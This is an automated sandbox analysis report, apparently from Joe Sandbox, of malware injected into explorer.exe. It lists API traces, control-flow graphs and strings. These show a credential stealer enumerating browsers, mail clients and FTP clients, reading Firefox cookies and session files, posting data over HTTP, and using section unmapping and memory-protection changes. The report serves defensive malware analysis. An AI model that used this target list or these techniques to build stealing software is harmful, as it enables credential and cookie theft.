                                                        • API String ID: 3430864794-1604029033
                                                        • Opcode ID: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                        • Instruction ID: 195aec8412d902ec1d20601123c3bc2efe934f71044cf50dfad01e2279433394
                                                        • Opcode Fuzzy Hash: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                        • Instruction Fuzzy Hash: 23415E71104345AFD311EF10DC48EABBBEDFF88745F00092EF58296252DB799A49CBA6

Control-flow Graph

Rendered control-flow graph omitted (graph data only; legend: executed / not executed blocks). Function at 00083449, basic blocks 83449-835cb, bracketed by RtlEnterCriticalSection and RtlLeaveCriticalSection. Block-level calls recoverable from the graph: sub_81274 (x3), sub_82f3d, sub_82d06, sub_82faa (x2), sub_82f1f (x2), sub_8105d (x2), sub_81141, sub_8104c, RtlZeroMemory, StrToIntA, lstrcat, RtlMoveMemory.
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083455
                                                        • lstrcat.KERNEL32 ref: 000834AB
                                                          • Part of subcall function 00082FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                          • Part of subcall function 00082FAA: StrToIntA.SHLWAPI(?), ref: 00083024
                                                          • Part of subcall function 00082FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                          • Part of subcall function 00082FAA: wsprintfA.USER32 ref: 000830B9
                                                          • Part of subcall function 00082FAA: lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                          • Part of subcall function 00082F1F: CreateThread.KERNEL32(00000000,00000000,00082ED2,?,00000000,00000000), ref: 00082F2F
                                                          • Part of subcall function 00082F1F: CloseHandle.KERNEL32(00000000), ref: 00082F36
                                                          • Part of subcall function 0008105D: VirtualFree.KERNEL32(?,00000000,00008000,00082B4B), ref: 00081065
                                                        • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00083504
                                                        • StrToIntA.SHLWAPI(?), ref: 0008352B
                                                        • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0008358D
                                                        • RtlLeaveCriticalSection.NTDLL(00086038), ref: 000835C1
                                                          • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                        • String ID: $Content-Length:$POST
                                                        • API String ID: 2960674810-114478848
                                                        • Opcode ID: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                        • Instruction ID: 94e072d73854c321fe1628760210cd651d563a19d9d3a009ac864edf1f9d31a3
                                                        • Opcode Fuzzy Hash: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                        • Instruction Fuzzy Hash: 7931C4306043418BEB11BF64D9686AB7BA9BF84701F01042DEAC29B353CB7E990DCF59
                                                        APIs
                                                          • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                          • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                          • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        • Sleep.KERNEL32(000003E8,?,00000000,?,00083834,?,00083C53,00000001), ref: 000836B3
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000836CC
                                                        • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 000836DC
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                          • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                          • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                          • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                          • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                          • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                        • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                        • API String ID: 2731919298-637609321
                                                        • Opcode ID: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                        • Instruction ID: e4b6859fe632719e62c2471a373af4e41d7e2c2c30c1e964f33e307738a03490
                                                        • Opcode Fuzzy Hash: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                        • Instruction Fuzzy Hash: A4F0A731300512339615336AAC0EDEF195DFFD7B52700012CB2C6962D2DE980943577A
                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                          • Part of subcall function 0008106C: lstrlen.KERNEL32(?,?,00000000,00000000,0008189F,75712B62,?,00000000), ref: 00081074
                                                          • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00081086
                                                          • Part of subcall function 000817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 000817EE
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 000818FB
                                                        • wsprintfW.USER32 ref: 000819F2
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081AD0
                                                        Strings
                                                        • Accept: */*Referer: %S, xrefs: 000819E8
                                                        • POST, xrefs: 000819A0
                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 00081A34
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                        • API String ID: 3833683434-704803497
                                                        • Opcode ID: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                        • Instruction ID: 3dcbdeb0ded9a8cf15a9f97d83848ce06ad77dce3e8d70dcbeb4fea29dcfcf14
                                                        • Opcode Fuzzy Hash: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                        • Instruction Fuzzy Hash: 648145B1608301AFD714AF68DC88AABBAEDFF88744F00092DF585D3251EB75D946CB52
                                                        APIs
                                                          • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                        • lstrcat.KERNEL32(?,00000000), ref: 000825BB
                                                        • lstrcat.KERNEL32(?,000842A8), ref: 000825C7
                                                        • lstrcat.KERNEL32(?,?), ref: 000825D6
                                                        • lstrcat.KERNEL32(?,000842AC), ref: 000825E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcat$AllocVirtual
                                                        • String ID: :authority$?$dyn_header
                                                        • API String ID: 3028025275-1785586894
                                                        • Opcode ID: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                        • Instruction ID: a3df1192de0655e9dc7a3e2b16972a5207b0361e37cf12fd9c8c807a48e009f7
                                                        • Opcode Fuzzy Hash: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                        • Instruction Fuzzy Hash: CC61E3725087128FC710FE24D5906AEB7E6BB94350F44092DF8C157283EA399E0EDB62
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • lstrcmpi.KERNEL32(?), ref: 000813A3
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                        • CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                        • String ID:
                                                        • API String ID: 868014591-0
                                                        • Opcode ID: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                        • Instruction ID: f597f1abedfdb78b4a50bf3d8acbfe31b34690e914edc3f9a8282d2ed78ac4e0
                                                        • Opcode Fuzzy Hash: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                        • Instruction Fuzzy Hash: 34F0C8315011149BE7706B25AC08BDF7BBCFF09321F0001A0F9D9E2190EB784E558F91
                                                        APIs
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0008291B
                                                        • lstrcat.KERNEL32(?,000842BC), ref: 0008292A
                                                        • lstrlen.KERNEL32(?,75712B62,00000001,?,?,00000000,?,?,00082B26,?,?,?,?,00000001), ref: 0008295C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$MemoryMovelstrcat
                                                        • String ID: cookie
                                                        • API String ID: 2957667536-1295510418
                                                        • Opcode ID: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                        • Instruction ID: f53226ebe774a6e1b9e5076833723ffb49a62c81fd320fd2bb11fdc6a523b402
                                                        • Opcode Fuzzy Hash: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                        • Instruction Fuzzy Hash: 0411B7323083029BD711BE94DC89B9BB7D9FF90714F14052DFDC197242EAB5E80A4791
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000400,00000000), ref: 000812BC
                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 000812CE
                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 000812E1
                                                        • CloseHandle.KERNEL32(00000000), ref: 000812F7
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                        • String ID:
                                                        • API String ID: 331459951-0
                                                        • Opcode ID: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                        • Instruction ID: 4c13458c48fa9fbbcfea10e07012997bffba25426b6b543f99b22ac2bec5ef8b
                                                        • Opcode Fuzzy Hash: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                        • Instruction Fuzzy Hash: 1DF09071806219FFAB20DFA0AD449EFBBBCFF01251F20426AE941D2140DB354E029BA1
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083332
                                                        • RtlLeaveCriticalSection.NTDLL(00086038), ref: 00083358
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID: POST
                                                        • API String ID: 3168844106-1814004025
                                                        • Opcode ID: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                        • Instruction ID: 55dcfb8202f6423abaeb440588ec9f58bbec6868fc7e7fe62f416efc705c6caf
                                                        • Opcode Fuzzy Hash: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                        • Instruction Fuzzy Hash: 63018131500114EBDB213F20EC4889F7FA9FFC5BA17184020FA8A96222DF36DE51DBA1

                                                        Execution Graph

                                                        Execution Coverage:6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:19
                                                        Total number of Limit Nodes:3
Rendered execution graph omitted (graph data only). Nodes recoverable from the graph: ed5da, ed614, ed62e, ed637, ed6f8, ed748, ed74d, ed835 (LoadLibraryA), ed879, ed884 (VirtualProtect, VirtualProtect), ed912; two entry paths (ed5da and ed637) both reach ed748, which resolves an import with LoadLibraryA and then changes page protection twice with VirtualProtect.

                                                        Callgraph

Rendered callgraph omitted (graph data only; legend: executed / not executed, opacity maps to relevance, disassembly available per node). The graph enumerates 125 functions, Function_000E1000 through Function_000ED70A, in the 000E0000 module; the edge list is not reproduced here.

                                                        Control-flow Graph

                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000E5378
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                        • Instruction ID: bd129d4dbaa6a4f5a0d3126f6d5f59154c7ee90844e48c327c9209267a2d9f65
                                                        • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                        • Instruction Fuzzy Hash: 1411C630601D894FEB9DF7BA58992B933D5EB58306F64093AE415D72A6DE798B808300

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000E1B74: OpenFileMappingA.KERNEL32 ref: 000E1B8B
                                                          • Part of subcall function 000E1B74: MapViewOfFile.KERNEL32 ref: 000E1BAA
                                                        • SysFreeMap.PGOCR ref: 000E51A9
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000E51B3
                                                        • Process32First.KERNEL32 ref: 000E51D6
                                                        • lstrcmpi.KERNEL32 ref: 000E51F1
                                                        • Process32Next.KERNEL32 ref: 000E52D9
                                                        • CloseHandle.KERNELBASE ref: 000E52EA
                                                        • SleepEx.KERNEL32 ref: 000E52F5
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32Viewlstrcmpi
                                                        • String ID:
                                                        • API String ID: 3402289966-0
                                                        • Opcode ID: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                        • Instruction ID: d71c50dd3138e9ac7706fb941c1d42d1f75f7732594f66d4c7faff6650fcf709
                                                        • Opcode Fuzzy Hash: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                        • Instruction Fuzzy Hash: BC51B730204E888FEB59EF69DC99AE973E1FB94305F040A69E407E71A2DF78D905C781

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 000ED847
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 000ED8E5
                                                        • VirtualProtect.KERNELBASE ref: 000ED903
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000EC000.00000040.80000000.00040000.00000000.sdmp, Offset: 000EC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_ec000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                        • Instruction ID: d53d9f834d506e3d4ff3502a79634dc9814ab7a84ab47d8519c68a9da176717b
                                                        • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                        • Instruction Fuzzy Hash: 1D51893236899D0FDB28AB3D9CC43F9B7D1F759325B58063BC4DAD3285EA58C8468381

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                        • Instruction ID: e5abea98356b676f12dbf069f3b67b236b1c676cd93db27c88262866e7ab4d0c
                                                        • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                        • Instruction Fuzzy Hash: 77F08C34318F094FAB44EF7C9C8C536B7E0EBA8202B008A7EA84AC7164EF34C8808701

                                                        Execution Graph

                                                        Execution Coverage: 10.3%
                                                        Dynamic/Decrypted Code Coverage: 97.4%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 306
                                                        Total number of Limit Nodes: 42

                                                        Callgraph


                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106B
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081074
                                                        • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107A
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                                        • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                                        • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                                        • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                                        • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                                        • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                                        • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                                        • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                                        • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                                        • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                                        • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                                        • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                                        • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                                        • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                                        • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                                        • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                                        • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                                        • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                                        • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                                        • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                                        • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                                        • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                                        • Sleep.KERNELBASE(000003E8), ref: 00081327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                        • API String ID: 2555639992-1680033604
                                                        • Opcode ID: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                                        • Instruction ID: c6fb3a315111370b2d623b8f7e562b9d3a4c86b5ba4b7d63d824c8c2a37431fe
                                                        • Opcode Fuzzy Hash: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                                        • Instruction Fuzzy Hash: F9719330604305ABDB50FBB19C49EAE7BECBF85B90B040529FAC1C7191EB75DA068B65

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                                        • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                                        • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                                        • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                                        • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                                        • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                                        • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                                        • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                                        • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                                        • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                                        • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                                        • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                                        • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                                        • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                                        • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                                        • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                                        • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                                        • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                                        • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                                        • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                                        • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                                        • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                                        • Sleep.KERNELBASE(000003E8), ref: 00081327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                        • API String ID: 3950187957-1680033604
                                                        • Opcode ID: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                                        • Instruction ID: 92ea90e728a065c3b10ee3f836ed5eb5e8a8dda0ab9d7eab971388ade25db994
                                                        • Opcode Fuzzy Hash: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                                        • Instruction Fuzzy Hash: 79517270604305A7DB50FBB18C85EAF7AECBF85B90B040939FAC1D6081EB64DA068B75

                                                        Control-flow Graph

                                                        control_flow_graph 112 87728-87745 113 8774b-87758 112->113 114 8790d 112->114 115 8776a-8776f 113->115 114->114 116 87771 115->116 117 87760-87765 116->117 118 87773 116->118 119 87766-87768 117->119 120 87778-8777a 118->120 119->115 119->116 121 8777c-87781 120->121 122 87783-87787 120->122 121->122 122->120 123 87789 122->123 124 8778b-87792 123->124 125 87794-87799 123->125 124->120 124->125 126 877a8-877aa 125->126 127 8779b-877a4 125->127 130 877ac-877b1 126->130 131 877b3-877b7 126->131 128 8781a-8781d 127->128 129 877a6 127->129 134 87822-87825 128->134 129->126 130->131 132 877b9-877be 131->132 133 877c0-877c2 131->133 132->133 136 877e4-877f3 133->136 137 877c4 133->137 135 87827-87829 134->135 135->134 138 8782b-8782e 135->138 140 87804-87811 136->140 141 877f5-877fc 136->141 139 877c5-877c7 137->139 138->134 142 87830-8784c 138->142 143 877c9-877ce 139->143 144 877d0-877d4 139->144 140->140 146 87813-87815 140->146 141->141 145 877fe 141->145 142->135 147 8784e 142->147 143->144 144->139 148 877d6 144->148 145->119 146->119 149 87854-87858 147->149 150 877d8-877df 148->150 151 877e1 148->151 152 8785a-87870 LoadLibraryA 149->152 153 8789f-878a2 149->153 150->139 150->151 151->136 154 87871-87876 152->154 155 878a5-878ac 153->155 154->149 156 87878-8787a 154->156 157 878ae-878b0 155->157 158 878d0-87900 VirtualProtect * 2 155->158 160 8787c-87882 156->160 161 87883-87890 GetProcAddress 156->161 162 878b2-878c1 157->162 163 878c3-878ce 157->163 159 87904-87908 158->159 159->159 164 8790a 159->164 160->161 165 87899-8789c 161->165 166 87892-87897 161->166 162->155 163->162 164->114 166->154
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000086000.00000040.80000000.00040000.00000000.sdmp, Offset: 00086000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_86000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                                        • Instruction ID: 9b19febec4c14d8985e07823db6ea8ccfd6019d3ec10bd7ab69b27837b6b85f3
                                                        • Opcode Fuzzy Hash: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                                        • Instruction Fuzzy Hash: FF512B7194C3918FD722AA78CC847B57BE0FB52320B390679C5E9CB3CAEB949805C761

                                                        Control-flow Graph

                                                        control_flow_graph 167 82861-82871 GetProcessHeap RtlAllocateHeap
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
